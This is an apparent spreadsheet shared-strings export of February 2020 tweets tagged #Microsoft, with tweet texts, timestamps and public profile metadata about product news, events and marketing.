  <si>
    <t>Fri Feb 28 02:55:14 +0000 2020</t>
  </si>
  <si>
    <t>Fri Feb 28 02:53:01 +0000 2020</t>
  </si>
  <si>
    <t>We always appreciate developments that make it easier to integrate more calls into your flow https://t.co/lNE7pfyIQn #callInstead #microsoft #android</t>
  </si>
  <si>
    <t>{'id': 517848370, 'id_str': '517848370', 'name': 'CallPlease', 'screen_name': 'CallPlease', 'location': 'Los Angeles, California', 'description': 'Cloud Based Collaborative Phone Sheet App for Web, iOS and Android! Integrated with #office365 and #gSuite', 'url': 'https://t.co/0MPBCduLRK', 'entities': {'url': {'urls': [{'url': 'https://t.co/0MPBCduLRK', 'expanded_url': 'https://www.callplease.com', 'display_url': 'callplease.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 134, 'friends_count': 830, 'listed_count': 4, 'created_at': 'Wed Mar 07 18:56:54 +0000 2012', 'favourites_count': 553, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 492,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'http://pbs.twimg.com/profile_images/1880933551/iTunesArtwork_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1880933551/iTunesArtwork_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/517848370/1487368896',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</si>
  <si>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02:50:37 +0000 2020</t>
  </si>
  <si>
    <t>Former engineer found guilty of stealing $10M in digital currency from Microsoft - SiliconANGLE #Bitcoin #digitalcurrency #JeffTran #Microsoft #theft #VolodymyrKvashuk https://t.co/8MQZyh7gYQ https://t.co/aIQfidUIDd</t>
  </si>
  <si>
    <t>Fri Feb 28 02:46:03 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Flight Simulator Feedback Snapshot for March and April unveiled #microsoft #flightsimulator https://t.co/KlHO2sBKhS https://t.co/GLvg08DTzC</t>
  </si>
  <si>
    <t>Fri Feb 28 02:43:40 +0000 2020</t>
  </si>
  <si>
    <t>Great to present @TexavieIncs solutions and partnerships at Canadas Digital Technology Supercluster Ideation Forum along with Best Buy, Fujitsu, other companies, and BC Ministry of Health. #MassiveData #microsoft #digitaltwin #precisionhealth #wearabletech @pservati https://t.co/suwee7pukW</t>
  </si>
  <si>
    <t>{'id': 882795056486166528, 'id_str': '882795056486166528', 'name': 'Texavie', 'screen_name': 'TexavieInc', 'location': 'Vancouver, British Columbia', 'description': 'Texavie is revolutionizing user experience in augmented and virtual reality (AR/VR) and connected life applications using comfortable smart textile devices.', 'url': 'https://t.co/zyScntu3d5', 'entities': {'url': {'urls': [{'url': 'https://t.co/zyScntu3d5', 'expanded_url': 'http://www.texavie.com', 'display_url': 'texavie.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 39, 'friends_count': 105, 'listed_count': 1, 'created_at': 'Thu Jul 06 02:55:17 +0000 2017', 'favourites_count': 61, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/922876184966324224/1LxEsOTZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/922876184966324224/1LxEsOTZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/882795056486166528/1508865924',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</si>
  <si>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02:38:38 +0000 2020</t>
  </si>
  <si>
    <t>Reply Becomes a Microsoft Azure Expert Managed Services Provider https://t.co/5BrnC5HMWv #ITnews #Azure #msp #microsoft</t>
  </si>
  <si>
    <t>{'id': 25768882, 'id_str': '25768882', 'name': 'Arthur Post', 'screen_name': 'Artpost', 'location': 'Highlands,NJ', 'description': '36 Years of experience in the Office Equipment Industry.   Former technician, former Dealer Principal, currently consulting with clients in Central New Jersey.', 'url': 'http://t.co/CN7u28vZRF', 'entities': {'url': {'urls': [{'url': 'http://t.co/CN7u28vZRF', 'expanded_url': 'http://www.p4photel.com', 'display_url': 'p4photel.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 771, 'friends_count': 260, 'listed_count': 57, 'created_at': 'Sun Mar 22 02:42:56 +0000 2009', 'favourites_count': 77, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 24204,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'http://pbs.twimg.com/profile_images/417228644/p4p_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/417228644/p4p_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/25768882/1457314761',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</si>
  <si>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02:38:09 +0000 2020</t>
  </si>
  <si>
    <t>The count down is on! #road2e2 
#Microsoft @MSAUedu 
Changemakers Assemble!!! https://t.co/othmXTXXLh</t>
  </si>
  <si>
    <t>{'id': 1103232526514978818, 'id_str': '1103232526514978818', 'name': 'David Jones', 'screen_name': 'DJoneseducator', 'location': 'Melbourne, Victoria', 'description': 'Passionate educator, husband and father.  #MIEExpert Global Minecraft Mentor. #road2e2  #MonashUni alum. #21CLD, #coding #STEM.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 634, 'friends_count': 755, 'listed_count': 10, 'created_at': 'Wed Mar 06 09:55:06 +0000 2019', 'favourites_count': 2233, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 773, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1103377634329681921/LRJr0MYz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1103377634329681921/LRJr0MYz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1103232526514978818/1582414503',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</si>
  <si>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02:30:41 +0000 2020</t>
  </si>
  <si>
    <t>How is your broom closet more secure than a server room with bank-level security? The short answer is: you need to upgrade your IT infrastructure and IISHAM Techsolutionology Pvt Ltd and #Microsoft can help. https://t.co/C5VNZMdtfx</t>
  </si>
  <si>
    <t>{'id': 1067763771131621376, 'id_str': '1067763771131621376', 'name': 'IISHAM Techsolutionology Pvt. Ltd.', 'screen_name': 'IishamT', 'location': 'Bengaluru South, India', 'description': 'We are technology enabled solution &amp; service consulting company with digital automation technology platforms.', 'url': 'https://t.co/8z2f2XctkP', 'entities': {'url': {'urls': [{'url': 'https://t.co/8z2f2XctkP', 'expanded_url': 'http://www.itechsolutionology.com', 'display_url': 'itechsolutionology.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 5, 'listed_count': 0, 'created_at': 'Wed Nov 28 12:54:55 +0000 2018', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 61, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1068807264046215168/yobdkIMv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1068807264046215168/yobdkIMv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1067763771131621376/1543658443',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</si>
  <si>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02:30:13 +0000 2020</t>
  </si>
  <si>
    <t>Everything u wanted to know about Dynamics 365 Sales Wave 1 enhancements, in one video. 
https://t.co/G76hV8BhSa
Dynamics 365 Sales Wave 1 2020
#dynamics365 #msdyn365 #sales #crm #diyd365 #bned365ug #microsoft  https://t.co/hvZgvEapyO</t>
  </si>
  <si>
    <t>{'id': 1160818522936631297, 'id_str': '1160818522936631297', 'name': 'Prashant Shukla | MVP | DIYD365 | #thenocodemonkey', 'screen_name': 'DIYD365', 'location': 'Australia', 'description': 'I know how it feels when u donâ€™t know coding n get stucked; I am here to tell u the no code solution. Follow &amp; Subscribe Please https://t.co/aeAlpDbROS', 'url': 'https://t.co/6Am9hj7I0I', 'entities': {'url': {'urls': [{'url': 'https://t.co/6Am9hj7I0I', 'expanded_url': 'http://www.diyd365.com', 'display_url': 'diyd365.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/aeAlpDbROS', 'expanded_url': 'http://linktr.ee/prashaantshukla', 'display_url': 'linktr.ee/prashaantshukla', 'indices': [128, 151]}]}}, 'protected': False, 'followers_count': 196, 'friends_count': 438, 'listed_count': 4, 'created_at': 'Mon Aug 12 07:41:17 +0000 2019', 'favourites_count': 803, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 465, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1195068685355892736/nsD3FjuV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1195068685355892736/nsD3FjuV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1160818522936631297/1580972566',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</si>
  <si>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02:30:12 +0000 2020</t>
  </si>
  <si>
    <t>Current #RPA vendors dont fear the entrance of #Microsoft into their market. Read their reaction here.  https://t.co/km6wkTcPtM
#Robotics #Automation #IoT #Futureofwork #Digital #Tech</t>
  </si>
  <si>
    <t>Fri Feb 28 02:27:01 +0000 2020</t>
  </si>
  <si>
    <t>I love #Microsoft #DragonBallZ season one is FREE in full HD!</t>
  </si>
  <si>
    <t>{'id': 2927163623, 'id_str': '2927163623', 'name': 'rinaldII', 'screen_name': 'RinaldRolle2', 'location': 'Tall Pines, Nassau', 'description': 'ðŸ¦‹ðŸ‡§ðŸ‡¸ no mistaking | North Androsian', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1021, 'friends_count': 924, 'listed_count': 2, 'created_at': 'Wed Dec 17 15:32:42 +0000 2014', 'favourites_count': 14546, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4512,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'http://pbs.twimg.com/profile_images/1234633540689694721/tplWygDz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234633540689694721/tplWygDz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2927163623/1568977355',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</si>
  <si>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02:18:23 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Edge Chromium Version Now Rolling Out With Windows 10 Update
#Microsoft #chromium #windows10
Read more  
https://t.co/EflRUVcs6E https://t.co/I9B8nczIZS</t>
  </si>
  <si>
    <t>{'id': 2952581383, 'id_str': '2952581383', 'name': 'ATN(Aviance Tech News)', 'screen_name': 'aviancetec', 'location': 'Kolkata', 'description': 'ATN provide the most complete and comprehensive daily coverage of science, technology, and gadgets news.', 'url': 'https://t.co/qsifGNSGCB', 'entities': {'url': {'urls': [{'url': 'https://t.co/qsifGNSGCB', 'expanded_url': 'http://aviancetechnologies.com', 'display_url': 'aviancetechnologies.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 17, 'friends_count': 270, 'listed_count': 0, 'created_at': 'Tue Dec 30 19:41:18 +0000 2014', 'favourites_count': 43, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1225104550912131072/GM1IO1vH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225104550912131072/GM1IO1vH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2952581383/1580924550',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</si>
  <si>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02:16:56 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Windows 10 KB4535996 Update Fixes Search, Printing Issues:" https://t.co/tI0JN6sYbW
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Fri Feb 28 02:15:00 +0000 2020</t>
  </si>
  <si>
    <t>#RSA2020: How to Improve Employee #Cybersecurity Compliance. #Worker #training is often ineffective, so #Microsoft redesigned its program. https://t.co/lRKrjpaBYo</t>
  </si>
  <si>
    <t>{'id': 18425738, 'id_str': '18425738', 'name': 'Carles Dijous (AAlb)', 'screen_name': 'carlesdijous', 'location': 'Barcelona, Catalonia', 'description': 'Colaborador docente UOC (Universitat Oberta de Catalunya). ICT observer. More: https://t.co/8QZHvDGVlK', 'url': 'http://t.co/LID7q7OB4C', 'entities': {'url': {'urls': [{'url': 'http://t.co/LID7q7OB4C', 'expanded_url': 'http://world2digits.blogspot.com/', 'display_url': 'world2digits.blogspot.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/8QZHvDGVlK', 'expanded_url': 'http://bit.ly/1LK7xZf', 'display_url': 'bit.ly/1LK7xZf', 'indices': [79, 102]}]}}, 'protected': False, 'followers_count': 9135, 'friends_count': 5650, 'listed_count': 2946, 'created_at': 'Sun Dec 28 11:08:16 +0000 2008', 'favourites_count': 686, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 304149,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'http://pbs.twimg.com/profile_images/491086958/CD_normal.JPG', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/491086958/CD_normal.JPG', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18425738/1398243050',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</si>
  <si>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02:12:16 +0000 2020</t>
  </si>
  <si>
    <t>OneDrive Roadmap Roundup- November 2019 #Microsoft  https://t.co/ZpnmhjQlOe</t>
  </si>
  <si>
    <t>Celebrating top OneDrive moments at Ignite 2019 #Microsoft  https://t.co/KiKQRQTwuj</t>
  </si>
  <si>
    <t>Fri Feb 28 02:07:26 +0000 2020</t>
  </si>
  <si>
    <t>Xbox-maker Microsoft withdraws from GDC gaming conference over #coronavirus concerns.
 #Microsoft plans an online-only event reports @lucasmtny for @TechCrunch https://t.co/QrPNiHzQNJ #Health #Gaming #Business #Xbox https://t.co/xBTmr6DuLW</t>
  </si>
  <si>
    <t>Fri Feb 28 02:06:40 +0000 2020</t>
  </si>
  <si>
    <t>i ask a question for you ? 
#
2  Windows 7 32bits = Windows 14 64 bits
#tech #Windows7 #Microsoft @Microsoft #geek #hack #doctype #programmer #developper #programming #it
#cyber #technology</t>
  </si>
  <si>
    <t>{'id': 3288023190, 'id_str': '3288023190', 'name': 'Djefferson Saintilus', 'screen_name': 'djefferson_sain', 'location': 'Haiti', 'description': 'Consultant Technical Security |DevBackend | #Gamer #cybersecurity', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 60, 'friends_count': 307, 'listed_count': 0, 'created_at': 'Thu Jul 23 01:28:44 +0000 2015', 'favourites_count': 125, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1177857460956258304/8gWsReFW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1177857460956258304/8gWsReFW_normal.jpg',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</si>
  <si>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This is so good lmao!! #sega #nintendo #sony #microsoft #videogames #gaming #meme #videogamememes #dreamcast #gamecube #xbox #playstation2 https://t.co/bQVNPzr8XN</t>
  </si>
  <si>
    <t>{'id': 142563574, 'id_str': '142563574', 'name': 'Retro Gaming Life', 'screen_name': 'FamicomFreak', 'location': 'Miami Beach, FL', 'description': 'Huge retro gamer and collector of retro gaming related items. I hope to find many people with my interest and please visit my blog!', 'url': 'https://t.co/PL9Y6d6HiO', 'entities': {'url': {'urls': [{'url': 'https://t.co/PL9Y6d6HiO', 'expanded_url': 'http://www.retrogaminglife.com', 'display_url': 'retrogaminglife.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1160, 'friends_count': 1408, 'listed_count': 26, 'created_at': 'Tue May 11 05:39:32 +0000 2010', 'favourites_count': 25, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 18982,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'http://pbs.twimg.com/profile_images/471709984732880896/17IYX37x_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/471709984732880896/17IYX37x_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/142563574/1483216801',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</si>
  <si>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02:05:01 +0000 2020</t>
  </si>
  <si>
    <t>#ICYMI Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC https://t.co/Sr8G9pfnvt #Azure #Cloud #Microsoft</t>
  </si>
  <si>
    <t>Fri Feb 28 02:03:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft and Epic are the latest to pull out of GDC due to coronavirus fears https://t.co/kH9ycViIAK
via @TechSpot #computing #microsoft https://t.co/RfpNOZVMaQ</t>
  </si>
  <si>
    <t>Fri Feb 28 02:00:31 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is trying to penetrate the market of #RPA. What is the reaction of current RPA vendors? Read it here.  https://t.co/FwR6mxvrAb
#Robotics #Automation #IoT #Futureofwork #Digital #Tech</t>
  </si>
  <si>
    <t>Fri Feb 28 02:00:11 +0000 2020</t>
  </si>
  <si>
    <t>The FaunaDB extension for @code allows users to browse their FaunaDB databases, indexes, collections, documents, and functions within the VS Code sidebar, plus create and run queries. https://t.co/waVJS83cy7
#Microsoft #VisualStudioCode #Serverless #Javascript #FaunaDB</t>
  </si>
  <si>
    <t>Fri Feb 28 02:00:06 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Global Social Entrepreneurship - offering technology, education, networking and grants to unlock the creative potential of social entrepreneurs and accelerate their impact. https://t.co/5bRHraAnq0</t>
  </si>
  <si>
    <t>Fri Feb 28 01:56:44 +0000 2020</t>
  </si>
  <si>
    <t>Icereach was pretty cool. lots of icy Nordic vibes mixed with witchy magic stuff. Love it!
-
-
-
-
-
-
-
#ESO #elderscrollsonline #icereach
#bethesdasoftworks #pcgaming #pc #ps4 #xboxone #microsoft #sony... https://t.co/jdQcsl4MF1</t>
  </si>
  <si>
    <t>{'id': 153088952, 'id_str': '153088952', 'name': 'The Immortal Artifact', 'screen_name': 'ImmortalArtfact', 'location': 'The Interwebs', 'description': 'Avid gamer, sometimes I stream, sometimes I write, sometimes I draw... depends on the day.', 'url': 'https://t.co/dpCnyyjP2f', 'entities': {'url': {'urls': [{'url': 'https://t.co/dpCnyyjP2f', 'expanded_url': 'http://bit.ly/2KfAHYM', 'display_url': 'bit.ly/2KfAHYM', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 78, 'friends_count': 285, 'listed_count': 7, 'created_at': 'Mon Jun 07 17:14:17 +0000 2010', 'favourites_count': 621, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 364,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'http://pbs.twimg.com/profile_images/1166676997533290496/l7S8shj-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1166676997533290496/l7S8shj-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/153088952/1566992447', 'profile_link_color': 'ABB8C2',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</si>
  <si>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Feb 28 01:55:23 +0000 2020</t>
  </si>
  <si>
    <t>ATLE JTC Spring Symposium
May 6, 2020. The keynote will be John Weigelt, leader of #Microsoft Canadas strategic policy &amp;amp; technology. This is a CANT miss event for jurisdiction leaders who are involved in implementing Learning &amp;amp; #Technology Framework https://t.co/58cH60w4xV #yeg https://t.co/gh8dPkf6Fg</t>
  </si>
  <si>
    <t>{'id': 3153000721, 'id_str': '3153000721', 'name': 'Alberta Technology Leaders in Education', 'screen_name': 'ATLEalberta', 'location': 'Alberta', 'description': 'Supporting #Education through the Convergence of #Learning, #Leadership and #Technology.', 'url': 'https://t.co/1M4xEIWiul', 'entities': {'url': {'urls': [{'url': 'https://t.co/1M4xEIWiul', 'expanded_url': 'https://www.atle.ca/', 'display_url': 'atle.ca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 682, 'friends_count': 590, 'listed_count': 7, 'created_at': 'Mon Apr 13 14:04:40 +0000 2015', 'favourites_count': 1016, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1195, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'B62026', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1167109362709479424/2x9YkDRm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1167109362709479424/2x9YkDRm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3153000721/1553628603', 'profile_link_color': 'B62026',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</si>
  <si>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01:51:49 +0000 2020</t>
  </si>
  <si>
    <t>MEGA MAN LEGACY COLLECTION
Capcom - Xbox One
#capcom #xboxone #microsoft #playasia #affiliate #weeklyspecial #megaman #sale
List price: US$ 20.89
Special price: US$ 17.99*
You save: US$ 2.90 (14%)
https://t.co/pl8whilgYr https://t.co/lcsj9dOK3U</t>
  </si>
  <si>
    <t>Fri Feb 28 01:46:15 +0000 2020</t>
  </si>
  <si>
    <t>Just finished 4 great #coaching #conversations with #leaders here at #Microsoft and heading out to jump on another coaching call from my home office.  The icing on the cake, getting to catch up with my prior manager, Brad Anderson.  Thanks for making the time, Brad!  Enjoy the https://t.co/ERkcD8VAtI</t>
  </si>
  <si>
    <t>{'id': 26056345, 'id_str': '26056345', 'name': 'Kathy Pearce, CPC, ACC', 'screen_name': 'kathypm', 'location': '', 'description': 'Career &amp; Leadership Coach, ICF Certified â­ï¸Activating professional women &amp; men to make a difference in the world while creating a life they truly love', 'url': 'https://t.co/Qx5TTRElCc', 'entities': {'url': {'urls': [{'url': 'https://t.co/Qx5TTRElCc', 'expanded_url': 'http://www.kathypearce.com', 'display_url': 'kathypearce.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 22, 'friends_count': 66, 'listed_count': 3, 'created_at': 'Mon Mar 23 18:18:28 +0000 2009', 'favourites_count': 1107, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 224,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'http://pbs.twimg.com/profile_images/1096184650819457025/qbGagsFN_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1096184650819457025/qbGagsFN_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/26056345/1495989361', 'profile_link_color': '9266CC',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</si>
  <si>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Fri Feb 28 01:45:52 +0000 2020</t>
  </si>
  <si>
    <t>IT has tried to tell me that Microsoft Office programs open slowly on my iMac because I have a Fusion Drive. So, I ask you, if you had a 1TB fusion drive, with 16GB RAM, and a 4.2 GHz processor, would you accept a program opening time of 5 minutes, per program. #apple #Microsoft</t>
  </si>
  <si>
    <t>{'id': 461593576, 'id_str': '461593576', 'name': 'Becc Repper', 'screen_name': 'BeccBanks', 'location': 'Perth, Western Australia', 'description': 'I like old things. Tweets are only my views. PhD Candidate and affiliate researcher working with photographs, archives, archaeology, and databases.', 'url': 'https://t.co/zD26gf4lGm', 'entities': {'url': {'urls': [{'url': 'https://t.co/zD26gf4lGm', 'expanded_url': 'https://uwa.academia.edu/RebeccaRepper', 'display_url': 'uwa.academia.edu/RebeccaRepper', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 280, 'friends_count': 386, 'listed_count': 22, 'created_at': 'Wed Jan 11 23:53:29 +0000 2012', 'favourites_count': 370, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2073,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'http://pbs.twimg.com/profile_images/952810089538179073/FaYHGuLf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/952810089538179073/FaYHGuLf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/461593576/1364190345',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</si>
  <si>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Feb 28 01:41:16 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft and Epic pull out of GDC
https://t.co/NG0bX333DC
#indiedev #gamedev #COVID19 #microsoft #epicgames</t>
  </si>
  <si>
    <t>Fri Feb 28 01:34:40 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft #msft 3pics. Lets see how it's coming along since my feb 4th call. #StockMarket #stocks #hedgefund #stocktrader https://t.co/YwHCuSbOIc</t>
  </si>
  <si>
    <t>Fri Feb 28 01:34:01 +0000 2020</t>
  </si>
  <si>
    <t>@Microsoft Power BI APIs .NET SDK v3 has been released!
This release, as is customary in #monthly desktop refreshes for the analytics service, brought a host of new #capabilities.
https://t.co/L8eYBfUj24
#dotnet #powerbi #microsoft #technews https://t.co/ZYf29Rx4lN</t>
  </si>
  <si>
    <t>{'id': 978579055485341696, 'id_str': '978579055485341696', 'name': 'Matthew Hardy', 'screen_name': 'SearchableMatt', 'location': 'Edinburgh', 'description': '.Net &amp; #JavaScript #Recruitment Expert @SearchabilityUK helping to find new and exciting careers for JavaScript Developers across #Scotland', 'url': 'https://t.co/ZcHKLBoUjF', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZcHKLBoUjF', 'expanded_url': 'http://searchability.co.uk/', 'display_url': 'searchability.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 936, 'friends_count': 3602, 'listed_count': 16, 'created_at': 'Tue Mar 27 10:26:42 +0000 2018', 'favourites_count': 1669, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 127,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'http://pbs.twimg.com/profile_images/1148179010385600513/06fBzpLO_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1148179010385600513/06fBzpLO_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/978579055485341696/1562323912',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</si>
  <si>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Feb 28 01:31:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Edge Now Lets You Block Potentially Unwanted Programs
https://t.co/UrjmqlEhhf https://t.co/wtV8T8WcXh</t>
  </si>
  <si>
    <t>Fri Feb 28 01:30:15 +0000 2020</t>
  </si>
  <si>
    <t>According to Gartner #RPA is the fastest growing segment in enterprise software. As a results the mega tech companies are attempting to get invested in this market. Read about the entrance of #Microsoft.  https://t.co/IcyiyYECS7
#Robotics #Automation #IoT #Futureofwork</t>
  </si>
  <si>
    <t>Fri Feb 28 01:30:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Quantum, the impact it has and the future! Learn how the most complex problems of the world are being solved using #QuantumComputing. https://t.co/a6v3ny4fdn</t>
  </si>
  <si>
    <t>{'id': 20999205, 'id_str': '20999205', 'name': 'Ravinder Pal Singh', 'screen_name': 'RavinderPalSing', 'location': 'Bangalore, India', 'description': 'Data &amp; AI Consultant @Microsoft', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 77, 'friends_count': 106, 'listed_count': 0, 'created_at': 'Mon Feb 16 16:26:52 +0000 2009', 'favourites_count': 3, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 181,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'http://pbs.twimg.com/profile_images/1230850641414590464/I6PnO9Rn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230850641414590464/I6PnO9Rn_normal.jpg',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</si>
  <si>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Fri Feb 28 01:29:59 +0000 2020</t>
  </si>
  <si>
    <t>Looking for a quick guide https://t.co/AJn2azcdh1 to get hands-on knowledge of DAX? Weve got you covered!
#PowerBI #BI #Tech #FridayMotivation #Microsoft #data</t>
  </si>
  <si>
    <t>Fri Feb 28 01:26:39 +0000 2020</t>
  </si>
  <si>
    <t>@EdwinMSarmiento Learn how to Build a Modern #Datawarehouse using #Azure with @nileshgule @ #PhilippineDataDay 2020. Register here to join the event: https://t.co/OOr3pnhQsO #dbwatch #sqlfamily #mvpbuzz #azuresynapseanalytics #azuresqldw  #azure #microsoft https://t.co/m6YFt7tR2S</t>
  </si>
  <si>
    <t>{'id': 53810002, 'id_str': '53810002', 'name': 'Pio Balistoy', 'screen_name': 'Pioisms', 'location': 'Singapore', 'description': 'Iâ€™d rather be sleeping if not building Legos with my sons. When Iâ€™m not busy with that I build &amp; watch over Databases making sure people donâ€™t mess it up.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 68, 'friends_count': 80, 'listed_count': 1, 'created_at': 'Sun Jul 05 01:46:17 +0000 2009', 'favourites_count': 93, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 106,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'http://pbs.twimg.com/profile_images/1145502826400903169/ES5JdQRP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1145502826400903169/ES5JdQRP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/53810002/1561944132',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</si>
  <si>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01:26:22 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Project - Foundation
#Microsoft #MicrosoftMalaysia #MicrosoftOffice #Office #Project #Corporate #CorporateTraining #IT #CorporateIT #CorporateITTraining #Training #Education #Learning #MCT... https://t.co/GLjlxVUFlj</t>
  </si>
  <si>
    <t>Fri Feb 28 01:15:16 +0000 2020</t>
  </si>
  <si>
    <t>AlpsLogic IT Solutions has experience &amp;amp; expertise in a broad range of Microsoft technologies and languages  #USA #Canada #hustle #business #entrepreneur #motivation #remote #nomad #angular #Azure #SharePoint #Dotnet #MVC #Microsoft #Technologies https://t.co/bppoUzLpij</t>
  </si>
  <si>
    <t>Fri Feb 28 01:13:57 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft release KB4535996 for #Windows 10 May 2019 and November 2019 Update with battery improvements, more. #Windows10  https://t.co/0qhIZivzEy</t>
  </si>
  <si>
